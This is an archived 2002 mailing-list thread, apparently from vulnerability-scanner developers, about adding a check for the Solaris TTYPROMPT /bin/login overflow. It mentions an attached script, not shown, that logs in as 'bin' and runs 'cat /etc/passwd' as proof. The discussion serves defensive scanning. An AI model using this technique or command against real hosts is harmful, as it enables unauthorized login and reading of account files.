Mailing List Archive: Solaris' TTYPROMPT + /bin/login overflow

Solaris' TTYPROMPT + /bin/login overflow

Oct 3, 2002, 8:45 AM

Post #1 of 3 (607 views)

A method of exploiting the /bin/login overflow on Solaris without
sending any shellcode has been discussed on Bugtraq. Attached is a
script which logs into the remote host as 'bin' and issues the output
of 'cat /etc/passwd'.

This plugin is redundant with plugin #10827, but shows hard proof that
we could log in. Shall I add it to the list of checks ?

-- Renaud

Re: Solaris' TTYPROMPT + /bin/login overflow [ In reply to ]

scheidell at secnap

Oct 3, 2002, 8:55 AM

Post #2 of 3 (604 views)

Permalink

On Thu, Oct 03, 2002 at 05:45:41PM +0200, Renaud Deraison wrote:
>
> A method of exploiting the /bin/login overflow on Solaris without
> sending any shellcode has been discussed on Bugtraq. Attached is a
> script which logs into the remote host as 'bin' and issues the output
> of 'cat /etc/passwd'.
>
> This plugin is redundant with plugin #10827, but shows hard proof that
> we could log in. Shall I add it to the list of checks ?

or add it to plugin 10827 as a second check.

--
Michael Scheidell, CEO
SECNAP Network Security, LLC
Sales: 866-SECNAPNET / (1-866-732-6276)
Main: 561-368-9561 / www.secnap.net
Looking for a career in Internet security?
http://www.secnap.net/employment/

Re: Solaris' TTYPROMPT + /bin/login overflow [ In reply to ]

peak at argo

Oct 3, 2002, 11:09 AM

Post #3 of 3 (609 views)

Permalink

On Thu, 3 Oct 2002, Renaud Deraison wrote:

> This plugin is redundant with plugin #10827, but shows hard proof that
> we could log in. Shall I add it to the list of checks ?

IMHO, you should merge it with #10827. Try to exploit it with
3 possible results:
1. exploitation successful,
2. exploitation not successful but the server crashed,
3. server did not care,
and revert to the old method in case #3.

--Pavel Kankovsky aka Peak
"Welcome to the Czech Republic. Bring your own lifeboats."

Mailing List Archive

Mailing List Archive

Attached Files: